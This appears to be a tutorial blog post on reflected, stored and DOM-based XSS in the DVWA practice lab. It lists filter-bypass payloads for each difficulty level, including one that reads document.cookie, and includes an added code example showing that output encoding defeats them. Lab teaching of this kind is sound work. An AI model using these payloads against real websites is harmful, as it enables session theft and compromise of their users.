Cross-Site Scripting (XSS) | DVWA (Damn Vulnerable Web Application)

Tanmay Bhattacharjee
Aug 5, 2020

XSS is a technique in which attackers inject malicious scripts into a target website, which may allow them to gain control of the website. If a website accepts user input such as a comment, username or email address field without any controls, an attacker can insert malicious script code as well.

TYPES OF XSS:

1. Reflected XSS

2. Stored XSS

3. DOM-Based XSS

Reflected XSS (cross-site scripting): RXSS

In this case, the attacker's data is not stored on the website; reflected XSS executes only on the victim's side. The attacker sends a script as input, the website reflects it back to the victim's browser, and the malicious JavaScript payload is executed there.

Let's try cross-site scripting in a virtual environment.

Requirements:

1. XAMPP or WAMP

2. DVWA (Damn Vulnerable Web Application)

3. A browser such as Firefox, Explorer, Cyberfox, Chrome, etc.

DVWA low level Reflected XSS:

Payload: <script>alert("xss")</script>

DVWA Medium Level Reflected XSS

Payload: <Script>alert("hack by falcon")</Script>

DVWA High Level Reflected XSS

Payload: <img src=x onerror=alert("falcon")>
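Why the payload has to change shape from level to level, and what stops all three: the sketch below is an added example, not code from the original post or from DVWA. It runs the three payloads above through two denylist filters and through output encoding; both filters and the `stillActive` check are hypothetical models written for this illustration.

```javascript
// Added example. The two filters are hypothetical models of denylist
// filtering (assumptions for illustration), not DVWA's own source code.

// The three reflected payloads quoted on this page, used as sample input.
const payloads = {
  low: '<script>alert("xss")</script>',
  medium: '<Script>alert("hack by falcon")</Script>',
  high: '<img src=x onerror=alert("falcon")>',
};

// Hypothetical filter A: delete the exact lowercase string "<script>".
const stripExactTag = (s) => s.split('<script>').join('');

// Hypothetical filter B: delete anything shaped like
// "<...s...c...r...i...p...t", in any letter case.
const stripScriptPattern = (s) =>
  s.replace(/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/gi, '');

// Fix: encode HTML metacharacters when writing user data into the page,
// so the browser renders the input as text instead of parsing it as markup.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);

// Demo-only heuristic: does the output still contain a script tag or an
// element with an inline event handler? This is not a real XSS detector.
const stillActive = (html) =>
  /<\s*script\b/i.test(html) || /<[^>]+\son\w+\s*=/i.test(html);

// Levels whose payload is still live markup after the given defense.
function survivors(defense) {
  return Object.keys(payloads).filter(
    (level) => stillActive(defense(payloads[level])));
}

console.log('exact-tag filter  :', survivors(stripExactTag));
console.log('pattern filter    :', survivors(stripScriptPattern));
console.log('output encoding   :', survivors(escapeHtml));
console.log('encoded high-level:', escapeHtml(payloads.high));
```

Each denylist removes only the markup its author thought of, while encoding on output leaves no `<` for the browser to parse, whatever tag or attribute the input uses.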

Stored XSS (cross-site scripting): SXSS

In stored cross-site scripting (XSS), the attacker's malicious code is stored on the target website and its web server. When an attacker can send malicious JavaScript to the website and that script is then executed on other users' computers, that is stored cross-site scripting.

DVWA Low Level Stored XSS:

Payload: <script>alert(document.domain)</script>

DVWA Medium Level Stored XSS

Payload: <img src=x onerror=alert(document.domain)>

DVWA High Level Stored XSS

Payload: <body onload=alert("bingo")>

DOM-Based XSS:

DOM-based XSS is short for Document Object Model-based cross-site scripting. Here the page's HTTP response itself does not change; instead, an attacker may use several DOM objects to create a cross-site scripting attack. The most popular objects from this perspective are document.URL, document.location, and document.referrer.

DVWA Low Level DOM XSS:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>

DVWA Medium Level DOM XSS:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script> and reload your browser.

DVWA High Level DOM XSS:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script> and reload browser.

Support by:

https://indiancybersecuritysolutions.com/

Thank you so much, and have a great day. I hope it will be useful for the cybersec community and WAPT.
